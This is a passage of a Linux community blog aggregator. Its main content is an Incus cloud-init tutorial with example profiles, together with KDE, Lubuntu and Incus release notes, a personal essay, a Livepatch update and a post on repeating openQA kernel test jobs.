  • kde-inotify-survey
  • plank-player
  • aura-browser

I am currently working on:

  • alligator
  • xwaylandvideobridge

KDE Snaps:

KDE applications 23.08.5 have been uploaded to the Candidate channel; testing help welcome: https://snapcraft.io/search?q=KDE I have also been working on bug fixes, time allowing.

My continued employment depends on you, please consider a donation! https://kubuntu.org/donate/

Thank you for stopping by!

~Scarlett

on February 23, 2024 11:42 AM

February 22, 2024

Thanks to all the hard work from our contributors, Lubuntu 22.04.4 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu, and the eighth release of Lubuntu with LXQt as the default desktop environment. Support lifespan: Lubuntu 22.04 LTS will be supported for 3 years, until April 2025. Our […]
on February 22, 2024 08:23 PM

We are pleased to announce the release of the next version of our distro, the fourth 22.04 LTS point release. The LTS version is supported for 3 years, while the regular releases are supported for 9 months. The new release rolls up various fixes and optimisations by the Ubuntu Budgie team that have been released since the 22.04.3 release in August: For the adventurous among our community we…

Source

on February 22, 2024 06:15 PM

February 21, 2024

Oxygen Icons 6 Released

Jonathan Riddell

Oxygen Icons is an icon theme for use with any XDG compliant app and desktop.

It is part of KDE Frameworks 6 but is now released independently to save on resources.

This 6.0.0 release requires building with extra-cmake-modules from KF 6, which is not yet released; distros may want to wait until next week before building it.

Distros which ship this version can drop the version released as part of KDE Frameworks 5.

sha256: 28ec182875dcc15d9278f45ced11026aa392476f1f454871b9e2c837008e5774

URL: https://download.kde.org/stable/oxygen-icons/

Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 21, 2024 10:20 AM

February 16, 2024

It’s Been Eighty Four Years…

For the first time in four years, Ubuntu Studio is opening up a wallpaper competition! While the default wallpaper will, once again, be designed by Ubuntu Studio art lead Eylul, we need your help to create a truly wonderful collection of unique wallpapers!

For more details, visit our post on the Ubuntu Discourse!

on February 16, 2024 07:16 PM

February 03, 2024

Incus is a manager for virtual machines and system containers. There is also an Incus support forum.

A virtual machine (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them. You can use cloud-init to customize virtual machines that are launched with Incus.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, though of any Linux distribution. You can use cloud-init to customize system containers that are launched with Incus.

In this post we see how to use cloud-init to customize Incus virtual machines and system containers. When you launch such an instance, it will be immediately customized to your liking and ready to use.

Prerequisites

  1. You have installed Incus or you have migrated from LXD.
  2. The container images that have a cloud variant are the ones that have support for cloud-init. Have a look at https://images.linuxcontainers.org/ and check that your favorite container image has a cloud variant in the Variant column.

You can also view which images have cloud-init support by running the following command. The command performs an image list for images on the images: remote, by matching the string cloud anywhere in their name.

incus image list images:cloud

Managing profiles in Incus

Incus has profiles, and these are used to group together configuration options. See how to use profiles in Incus.

When you launch a system container or a virtual machine, Incus by default uses the default profile for the configuration.

Let’s show this profile. The config section is empty; this is where we will later add the cloud-init configuration. There are two devices: the eth0 network device (because it is of type nic), which is served by the incusbr0 network bridge (if you migrated from LXD, it might be called lxdbr0). Then there is the root disk device (because it is of type disk), which is served by the default storage pool. You can dig for more with incus network list and incus storage list.

$ incus profile show default
config: {}
description: Default Incus profile
devices:
  eth0:
    name: eth0
    network: incusbr0
    type: nic
  root:
    path: /
    pool: default
    type: disk
name: default
used_by:
....
$ 

You can perform many actions on Incus profiles. Here is the list of commands.

$ incus profile 
Usage:
  incus profile [flags]
  incus profile [command]

Available Commands:
  add         Add profiles to instances
  assign      Assign sets of profiles to instances
  copy        Copy profiles
  create      Create profiles
  delete      Delete profiles
  device      Manage devices
  edit        Edit profile configurations as YAML
  get         Get values for profile configuration keys
  list        List profiles
  remove      Remove profiles from instances
  rename      Rename profiles
  set         Set profile configuration keys
  show        Show profile configurations
  unset       Unset profile configuration keys

Global Flags:
      --debug          Show all debug messages
      --force-local    Force using the local unix socket
  -h, --help           Print help
      --project        Override the source project
  -q, --quiet          Don't show progress information
      --sub-commands   Use with help or --help to view sub-commands
  -v, --verbose        Show all information messages
      --version        Print version number

Use "incus profile [command] --help" for more information about a command.
$ 

Creating a profile for cloud-init

We are going to create a new profile - not a fully-fledged profile, but one that has just the cloud-init configuration. Then, when we use it, we will specify that new profile along with the default profile. By doing so, we are not messing with the default profile; we keep them separate and tidy.

$ incus profile create cloud-dev
Profile cloud-dev created
$ incus profile show cloud-dev
config: {}
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

We want to insert the following cloud-init configuration. If you are viewing the following on my blog, you will notice that there is a gray background color for the text. That matters: there must be no extra spaces at the end of the lines, as those would cause formatting issues later on. The cloud-init.user-data key says that what follows is cloud-init configuration. The | character at the end of the line is very significant; it means that until the end of this field, all content is kept verbatim. Whatever appears there will be injected into the instance as soon as it starts, at the proper location for cloud-init. When the instance starts for the first time, it runs the cloud-init service, which looks for the injected commands and processes them accordingly. In this example, we use runcmd to run the touch command and create the file /tmp/simos_was_here. We just want some evidence that cloud-init actually worked.

  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here]

We need to open the profile for editing, then paste the configuration. When you run the following command, a text editor will open (likely pico) and you can paste the above text into the config section. Remove the {} from the config: {} line.

$ incus profile edit cloud-dev
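
As an aside, if you would rather avoid the interactive editor, the same result can likely be achieved non-interactively by saving the configuration (from the #cloud-config line onwards) into a file, say cloud-dev.yml, and setting the key directly:

incus profile set cloud-dev cloud-init.user-data="$(cat cloud-dev.yml)"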

Here is how the cloud-dev profile should look in the end. The command has a certain format: it’s a list of items, the first being the actual command to run (touch), and the second the argument to the command. It’s going to run touch /tmp/simos_was_here and should work with all distributions.

$ incus profile show cloud-dev
config:
  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here]
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

Now we are ready to launch a container.

Launching an Incus container with cloud-init

Alpine is a lightweight Linux distribution. Let’s see what’s in store for Alpine images that have cloud support. Using incus image (for Incus image-related commands), we list the available images from the images: remote and filter for alpine and cloud. Whatever comes after the remote (i.e. images:) is a filter word.

incus image list images: alpine cloud

Here is the full output. I appended --columns ldt to the command, which shows only three columns: l for shortest alias, d for description, and t for image type (either container or virtual machine). Without the column selection, the output would be too wide and would not fit in my blog’s narrow width.

$ incus image list images: alpine cloud --columns ldt
+----------------------------+------------------------------------+-----------------+
|           ALIAS            |            DESCRIPTION             |      TYPE       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud (1 more) | Alpine 3.16 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud (1 more) | Alpine 3.16 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud/arm64    | Alpine 3.16 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.16/cloud/arm64    | Alpine 3.16 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud (1 more) | Alpine 3.17 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud (1 more) | Alpine 3.17 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud/arm64    | Alpine 3.17 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.17/cloud/arm64    | Alpine 3.17 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud (1 more) | Alpine 3.18 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud (1 more) | Alpine 3.18 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud/arm64    | Alpine 3.18 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.18/cloud/arm64    | Alpine 3.18 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud (1 more) | Alpine 3.19 amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud (1 more) | Alpine 3.19 amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud/arm64    | Alpine 3.19 arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/3.19/cloud/arm64    | Alpine 3.19 arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud (1 more) | Alpine edge amd64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud (1 more) | Alpine edge amd64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud/arm64    | Alpine edge arm64 (20240202_13:00) | CONTAINER       |
+----------------------------+------------------------------------+-----------------+
| alpine/edge/cloud/arm64    | Alpine edge arm64 (20240202_13:00) | VIRTUAL-MACHINE |
+----------------------------+------------------------------------+-----------------+
$ 

I am going to use alpine/3.19/cloud. Alpine 3.19 was released in December 2023, so it’s a fairly recent version. The same version is also available as a virtual machine image, which is handy: we could use the virtual machine version simply by adding --vm when we launch the image through incus launch, and the rest would be the same. In the following we will be launching a container.

In the following, I launch the cloud variant of the Alpine 3.19 image (images:alpine/3.19/cloud), give it the name myalpine, and apply both the default and cloud-dev Incus profiles. Why apply the default Incus profile as well? Because when we specify a profile, Incus does not add the default profile by default (see what I did here?). Therefore, we specify first the default profile, then the new cloud-dev profile. If the default profile had some configuration in its config: section, the new cloud-dev profile would mask (hide) it; the cloud-init configuration is not merged among profiles, and the last profile in the list overwrites any previous cloud-init configuration. Then we get a shell into the container and check that the file has been created in /tmp. Finally, we exit, stop the container and delete it. Nice and clean.

$ incus launch images:alpine/3.19/cloud myalpine --profile default --profile cloud-dev
Launching myalpine
$ incus shell myalpine
myalpine:~# ls -l /tmp/
total 1
-rw-r--r--    1 root     root             0 Feb  3 12:02 simos_was_here
myalpine:~# exit
$ incus stop myalpine
$ incus delete myalpine
$ 

Case study: Disable IPv6 addresses in container

The ultimate purpose of cloud-init is to provide customization while sticking with the standard container images as they are provided by the images: remote. The alternative to cloud-init would be to create a whole range of custom images with our desired changes. In this case study, we are going to create a cloud-init configuration that disables IPv6 in Alpine containers (and virtual machines). The motivation for this was a request by a user on the Incus discussion and support forum. Read over there how you would manually disable IPv6 in an Alpine container.

Here are the cloud-init instructions that disable IPv6 in an Alpine container or virtual machine. Alpine gets its addresses from DHCP, which includes IPv4 and IPv6 addresses. Early in the boot process, we use the bootcmd module to run commands: we add a configuration snippet to the sysctl service to disable IPv6, enable the sysctl service (it is disabled by default in Alpine Linux), and finally restart the service in order to apply the configuration we just added.

  cloud-init.user-data: |
    #cloud-config
    bootcmd:
      - echo "net.ipv6.conf.all.disable_ipv6 = 1" > /etc/sysctl.d/10-disable-ipv6.conf
      - rc-update add sysctl default
      - rc-service sysctl restart

Here we test the new Incus profile with cloud-init that disables IPv6 in a container. There is no IPv6 address in the container.

$ incus launch images:alpine/3.19/cloud myalpine --profile default --profile cloud-alpine-noipv6
Launching myalpine
$ incus list myalpine
+----------+---------+--------------------+------+-----------+-----------+
|   NAME   |  STATE  |         IPV4       | IPV6 |   TYPE    | SNAPSHOTS |
+----------+---------+--------------------+------+-----------+-----------+
| myalpine | RUNNING | 10.10.10.44 (eth0) |      | CONTAINER | 0         |
+----------+---------+--------------------+------+-----------+-----------+
$ incus stop myalpine
$ incus delete myalpine
$ 
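
If you want to double-check from inside the instance before deleting it, the sysctl value should read 1; something like this (run while the instance is still up) would confirm it:

incus exec myalpine -- sysctl net.ipv6.conf.all.disable_ipv6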

We tried with a system container; how about a virtual machine? Let’s try the same with a virtual machine: the same command, but with --vm added to it. We get an error that the Alpine Linux image is incompatible with Secure Boot. Incus provides an environment that offers Secure Boot, but Alpine Linux cannot work with it; therefore, we instruct Incus not to offer Secure Boot.

$ incus launch images:alpine/3.19/cloud myalpine --vm --profile default --profile cloud-alpine-noipv6
Launching myalpine
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
$ incus delete --force myalpine
$ incus launch images:alpine/3.19/cloud myalpine --vm --profile default --profile cloud-alpine-noipv6 --config security.secureboot=false
Launching myalpine
$ incus list myalpine
+----------+---------+--------------------+------+-----------------+-----------+
|   NAME   |  STATE  |        IPV4        | IPV6 |      TYPE       | SNAPSHOTS |
+----------+---------+--------------------+------+-----------------+-----------+
| myalpine | RUNNING | 10.10.10.88 (eth0) |      | VIRTUAL-MACHINE | 0         |
+----------+---------+--------------------+------+-----------------+-----------+
$ incus stop myalpine
$ incus delete myalpine
$ 

Case study: Launching a Debian instance with a Web server

A common task when using Incus is to launch an instance, install a Web server, modify the default HTML file to say Hello, world!, and finally view the page using the host’s Web browser. Instead of doing all these steps manually, we automate them.

In this example, when the instance is launched, Incus places the cloud-init instructions in the file /var/lib/cloud/seed/nocloud-net/user-data, and the cloud-init service in the instance is started. The following Incus profile uses more advanced cloud-init directives: it performs a package update, then a package upgrade, and finally reboots if the package upgrade requires it. We do not need to specify which commands perform the package update or upgrade, because cloud-init can deduce them from the running system. Next, it installs the nginx package. Finally, our custom script is created in /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh. The cloud-init service runs the edit-nginx-index.sh script, which modifies /var/www/html/index.nginx-debian.html, the default HTML file for nginx on Debian.

$ incus profile create cloud-debian-helloweb
Profile cloud-debian-helloweb created
$ incus profile edit cloud-debian-helloweb
<furiously editing the cloud-init section>
$ incus profile show cloud-debian-helloweb 
config:
  cloud-init.user-data: |
    #cloud-config
    package_update: true
    package_upgrade: true
    package_reboot_if_required: true
    packages:
      - nginx
    write_files:
    - path: /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh
      permissions: 0755
      content: |
        #!/bin/bash
        sed -i 's/Welcome to nginx/Welcome to Incus/g' /var/www/html/index.nginx-debian.html
        sed -i 's/Thank you for using nginx/Thank you for using Incus/g' /var/www/html/index.nginx-debian.html
description: ""
devices: {}
name: cloud-debian-helloweb
used_by: []
$ 

Let’s test these in a Debian system container.

$ incus launch images:debian/12/cloud mydebian --profile default --profile cloud-debian-helloweb
Launching mydebian
$ incus list mydebian --columns ns4t
+----------+---------+---------------------+-----------+
|   NAME   |  STATE  |         IPV4        |   TYPE    |
+----------+---------+---------------------+-----------+
| mydebian | RUNNING | 10.10.10.120 (eth0) | CONTAINER |
+----------+---------+---------------------+-----------+
$ 

Open the above IP address in your favorite Web browser. Note that the home page now has two references to Incus, thanks to the changes we made through cloud-init.
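
You can also verify from the host’s command line; a minimal check (substitute the IP address of your own instance) would be:

curl -s http://10.10.10.120/ | grep -i incus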

For completeness, here is the same with a Debian virtual machine. In this case, we just add --vm to the incus launch command line and all the rest stays the same; the Debian VM image works with Secure Boot. When you get the IP address, open the page in your favorite Web browser. Note that since this is a virtual machine, the network device is not eth0 but a normal-looking network device.

$ incus stop mydebian
$ incus delete mydebian
$ incus launch images:debian/12/cloud mydebian --vm --profile default --profile cloud-debian-helloweb
Launching mydebian

<wait 10-20 seconds, because virtual machines take more time to set up>

$ incus list mydebian --columns ns4t
+----------+---------+------------------------+-----------------+
|   NAME   |  STATE  |          IPV4          |      TYPE       |
+----------+---------+------------------------+-----------------+
| mydebian | RUNNING | 10.10.10.110 (enp5s0) | VIRTUAL-MACHINE |
+----------+---------+------------------------+-----------------+
$ 

Summary

We have seen how to use the cloud Incus images, both for containers and virtual machines. They provide customization for Incus instances and help you get them configured to your liking from the start.

cloud-init offers a lot of opportunity for customization. Normally you would set up the Incus instance manually to your liking, and then translate your changes into cloud-init commands.

Bonus content #1: Cloud-init from command-line

You can also pass the cloud-init configuration on the command line at the moment you create the instance. That is, you can even use cloud-init in Incus without a profile!

Here is the very first example of this tutorial.

  cloud-init.user-data: |
    #cloud-config
    runcmd:
      - [touch, /tmp/simos_was_here]

We remove the first line and keep the rest, saving it as a file named, for example, cloud-simos.yml.

#cloud-config
runcmd:
  - [touch, /tmp/simos_was_here]

Next, we can launch an instance with the following syntax. We use the --config parameter to set the key cloud-init.user-data to the content of (in this example) the cloud-simos.yml file. The $(command) construct is Bash syntax; it is most likely supported in other shells too, but if you use automation, verify that your shell supports it.

incus launch images:alpine/3.19/cloud alpine  --config=cloud-init.user-data="$(cat cloud-simos.yml)"

Bonus content #2

There are two configurable keys in cloud-init.

  1. The cloud-init.user-data, meant for user configuration.
  2. The cloud-init.vendor-data, meant for vendor configuration.

In our case, if we plan to use several Incus profiles with cloud-init configuration, it is possible to split the configuration between two profiles. The two sets of configuration run separately from each other, and the user-data is applied last.
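
As a sketch of how that split might look (the profile names and file names here are made up for illustration), you could keep vendor defaults and user tweaks in separate profiles and apply both:

incus profile create cloud-vendor
incus profile set cloud-vendor cloud-init.vendor-data="$(cat vendor.yml)"
incus profile create cloud-user
incus profile set cloud-user cloud-init.user-data="$(cat user.yml)"
incus launch images:debian/12/cloud mydebian --profile default --profile cloud-vendor --profile cloud-user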

Troubleshooting

Error: My cloud-init instructions are all messed up!

Here is what I got!

$ incus profile show cloud-dev
config:
  cloud-init.user-data: "#cloud-config\nruncmd: \n  - [touch, /tmp/simos_was_here]\n"
description: ""
devices: {}
name: cloud-dev
used_by: []
$ 

This happens if there are any extra spaces at the end of the cloud-init lines. pico, the default editor, tries to help you spot this. The problem above happened because there was an extra space somewhere in the cloud-init configuration.

In this case there was an extra space at the end of runcmd:, which pico highlights in red. Not good.

You will need to remove the configuration and paste it again, taking care with the formatting. While editing with the pico text editor, there should be no red blocks at the end of the lines.

How can I debug cloud-init?

When an Incus instance with cloud-init is launched, the cloud-init service runs and creates two log files, /var/log/cloud-init.log and /var/log/cloud-init-output.log.
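
You can also ask cloud-init itself how the run went. Assuming the image ships a reasonably recent cloud-init, and with myinstance as a placeholder name, something like this reports the overall status:

incus exec myinstance -- cloud-init status --long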

Here are some relevant lines from cloud-init.log relating to the nginx example.

2024-02-03 19:07:09,237 - util.py[DEBUG]: Writing to /var/lib/cloud/scripts/per-boot/edit-nginx-index.sh - wb: [755] 200 bytes
...
2024-02-03 19:07:14,814 - subp.py[DEBUG]: Running command ['/var/lib/cloud/scripts/per-boot/edit-nginx-index.sh'] with allowed return codes [0] (shell=False, capture=False)
...

Error: Unable to connect

If you try to open the Web server in the Incus instance and you get the browser error Unable to connect, then:

  1. Verify that you got the correct IP address of the Incus instance.
  2. Verify that the URL is http:// and not https://. Some browsers switch automatically to https, while in these examples we have only launched plain-http Web servers.
on February 03, 2024 07:39 PM

January 30, 2024

There’s a YouTube channel called Clickspring, run by an Australian bloke called Chris who is a machinist: a mechanical engineer with a lathe and a mill and all manner of little tools. I am not a machinist — at school I was fairly inept at what we called CDT, for Craft Design and Technology, and what Americans much more prosaically call “shop class”. My dad was, though, or an engineer at least. Although Chris builds clocks and beautiful brass mechanisms, and my dad built aeroplanes. Heavy engineering. All my engineering is software, which actual engineers don’t think is engineering at all, and most of the time I don’t either.

You can romanticise it: claim that software development isn’t craft, it’s art. And there is a measure of truth in this. It’s like writing, which is the other thing I spend a lot of time doing for money; that’s an art, too.

If you’re doing it right, at least.

Most of the writing that’s done, though, isn’t art. And most of the software development isn’t, either. Or most of the engineering. For every one person creating beauty in prose or code or steel, there are fifty just there doing the job with no emotional investment in what they’re doing at all. Honestly, that’s probably a good thing, and not a complaint. While I might like the theoretical idea of a world where everything is hand made by someone who cares, I don’t think that you should have to care in order to get paid. The people who are paying you don’t care, so you shouldn’t have to either.

It’s nice if you can swing it so you get both, though.

The problem is that it’s not possible to instruct someone to give a damn. You can’t regulate the UK government into giving a damn about people who fled a war to come here to find their dream of being a nurse, you can’t regulate Apple bosses into giving a damn about the open web, you can’t regulate CEOs into giving a damn about their employees or governments about their citizens or landlords about their tenants. That’s not what regulation is for; people who give a damn largely don’t need regulation because they want to do the right thing. They might need a little steering into knowing what the right thing is, but that’s not the same.

No, regulation is there as a reluctant compromise: since you can’t make people care, the best you can do is in some rough and ready fashion make them behave in a similar way to the way they would if they did. Of course, this is why the most insidious kind of response is not an attempt to evade responsibility but an attack on the system of regulation itself. Call judges saboteurs or protesters criminals or insurgents patriots. And why the most heinous betrayal is one done in the name of the very thing you’re destroying. Claim to represent the will of the people while hurting those people. Claim to be defending the law while hiding violence and murder behind a badge. Claim privacy as a shield for surveillance or for exclusion. We all sorta thought that the system could protect us, that those with the power could be trusted to use it at least a little responsibly. And the last year has been one more in a succession of years demonstrating just how wrong that is. This and no other is the root from which a tyrant springs; when he first appears he is a protector.

The worst thing about it is that the urge to protect other people is not only real but the best thing about ourselves. When it’s actually real. Look after others, especially those who need it, and look after yourself, because you’re one of the people who needs it.

Chris from Clickspring polishes things to a high shine using tin, which surprised me. I thought bringing out the beauty in something needed a soft cloth but no, it’s done with metal. Some things, like silver, are basically shiny with almost no effort; there’s a reason people have prized silver things since before we could even write down why, and it’s not just because you could find lumps of it lying around the place with no need to build a smelting furnace. Silver looks good, and makes you look good in turn. Tin is useful, and it helps polish other things to a high shine.

Today’s my 48th birthday. A highly composite number. The ways Torah wisdom is acquired. And somewhere between silver and tin. That sounds OK to me.

on January 30, 2024 09:50 PM

January 26, 2024

Announcing Incus 0.5

Stéphane Graber

Incus 0.5 is now out as the first release of 2024!

This is the first release featuring no imported changes from the LXD project, following Canonical’s decision to re-license LXD and add in a CLA. You’ll find details about that in one of my previous posts.

Overall, it’s a pretty busy release with a good mix of CLI improvements, new features for VM users, more flexibility around cluster evacuations and host shutdowns and a few more API improvements.

A variety of 3rd-party tools have also been getting Incus support since the previous release, including Ansible, Terraform/OpenTofu and Packer.

Also of note, we now have native distribution packages for Arch Linux, Debian, Gentoo, NixOS, Ubuntu and Void Linux, with ongoing work on a native Fedora package (a COPR repo is available until then).
We’ve updated our installation instructions to cover all of those!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

As always, you can take Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

Just a quick reminder that my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship.
You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects are also always appreciated; you can find me on Github Sponsors, Patreon and Ko-fi.

And lastly, a quick note that I’ll be at FOSDEM next week, so if you’re attending and want to come say hi, you’ll find me in the containers devroom on Saturday and the kernel devroom on Sunday!

on January 26, 2024 09:45 PM

January 25, 2024

Linux kernel getting a livepatch whilst running a marathon. Generated with AI.

Livepatch service eliminates the need for unplanned maintenance windows for high and critical severity kernel vulnerabilities by patching the Linux kernel while the system runs. Originally the service launched in 2016 with just a single kernel flavour supported.

Over the years, additional kernels were added: new LTS releases, ESM kernels, Public Cloud kernels, and most recently HWE kernels too.

Recently, livepatch support was expanded to FIPS-compliant kernels, Public Cloud FIPS-compliant kernels, and IBM Z (mainframe) kernels, bringing the total to over 60 distinct kernel flavours supported in parallel. The table of supported kernels in the documentation lists the supported kernel flavours' ABIs, the duration of each build's support window, the supported architectures, and the Ubuntu release. This work was only possible thanks to collaboration with the Ubuntu Certified Public Cloud team, engineers at IBM for IBM Z (s390x) support, the Ubuntu Pro team, and the Livepatch server & client teams.

It is a great milestone, and I personally enjoy seeing the non-intrusive popup on my Ubuntu Desktop that a kernel livepatch was applied to my running system. I do enable Ubuntu Pro on my personal laptop thanks to the free Ubuntu Pro subscription for individuals.
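If you want the same on your own machine, enabling it is quick. A minimal sketch using the standard Ubuntu Pro tooling (substitute the token from your own Ubuntu Pro account):

# Attach this machine to your Ubuntu Pro subscription, then turn on Livepatch:
sudo pro attach <your-token>
sudo pro enable livepatch

# Check which livepatches are applied to the running kernel:
canonical-livepatch status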

What's next? The next frontier is supporting ARM64 kernels. The Canonical kernel team has completed the gap analysis needed to start supporting the Livepatch Service on ARM64. Upstream Linux requires development work on the consistency model to fully support livepatch on ARM64 processors. Livepatch code changes are applied on a per-task basis, when the task is deemed safe to switch over. This safety check depends mostly on kernel stacktraces; for these checks, CONFIG_HAVE_RELIABLE_STACKTRACE needs to be available in the upstream ARM64 kernel (see the Linux kernel documentation). There are preliminary patches that enable reliable stacktraces on ARM64; however, these turned out to be problematic, as there are lots of fix revisions that came after the initial patchset that AWS ships with 5.10. This is a call for help from any interested parties: if you have engineering resources and are interested in bringing the Livepatch Service to your ARM64 platforms, please reach out to the Canonical kernel team on the public Ubuntu Matrix, Discourse, and mailing list. If you want to chat in person, see you at FOSDEM next weekend.

on January 25, 2024 06:01 PM
Lubuntu 23.04 has reached end-of-life as of today, January 25, 2024. It will no longer receive software updates (including security fixes) or technical support. All users are urged to upgrade to Lubuntu 23.10 as soon as possible to stay secure. You can upgrade to Lubuntu 23.10 without reinstalling Lubuntu from scratch by following the official […]
on January 25, 2024 04:18 PM

Testing kernels with sporadic issues until heisenbug shows in openQA

This is a follow-up to my previous post about How to test things with openQA without running your own instance, so you might want to read that first.

While hunting for bsc#1219073, which is quite sporadic and took quite some time to show up often enough to become noticeable and traceable, once the stars aligned and I managed to find a way to get a higher failure rate, I wanted a way for me and for the developer to test the kernel with the different patches, to help with the bisecting and ease the process of finding the culprit and a solution for it.

I came up with a fairly simple solution, using the --repeat parameter of the openqa-cli tool and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;
```

There are a few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run; covering all supported architectures is recommended (at least for this case).
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something else that makes sense.
  • the TEST variable sets the name of the test as it will show up in the test overview page. You can use TEST+=foo if you want to append text instead of overriding it. The --repeat parameter will append a number incrementally to your test; see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable sets the YAML schedule to use. There are other ways to modify the schedule, but in this case I want to perform a full installation.

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see the post linked at the beginning of this one.
  • Replace the kernel repo with your branch in line 5.
  • Run the script with bash trigger-kernel-openqa-mdadm.sh and you should get output like the following, repeated as many times as --repeat specifies:
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL will be a job triggered in openQA. Depending on the load and the number of jobs, you might need to wait quite a bit (some users can help by raising the priority of these jobs so they execute faster).

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5, or from any job in the list above, click on the Job groups menu at the top and select Build bsc1219073.
  • Click on “Filter”.
  • Type the name of the test module to filter by in the Module name field, e.g. mdadm, and select the desired result for that module, e.g. failed (you can also select multiple result types).
  • Click Apply.
  • The overall summary on the build overview page will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad. For example, 7 failures out of 100 cloned jobs is a 7% failure rate, over the threshold. But you also need to understand your sample size and the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called jobs-launched.list. If you absolutely need to change the priority of the jobs, set it to 45 so they run above the default priority of 50:

cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule: right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which adds the kernel repo specified by KOTD_REPO, installs the kernel from there, reboots the system, and leaves it ready for the actual test. However, I had to make some very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
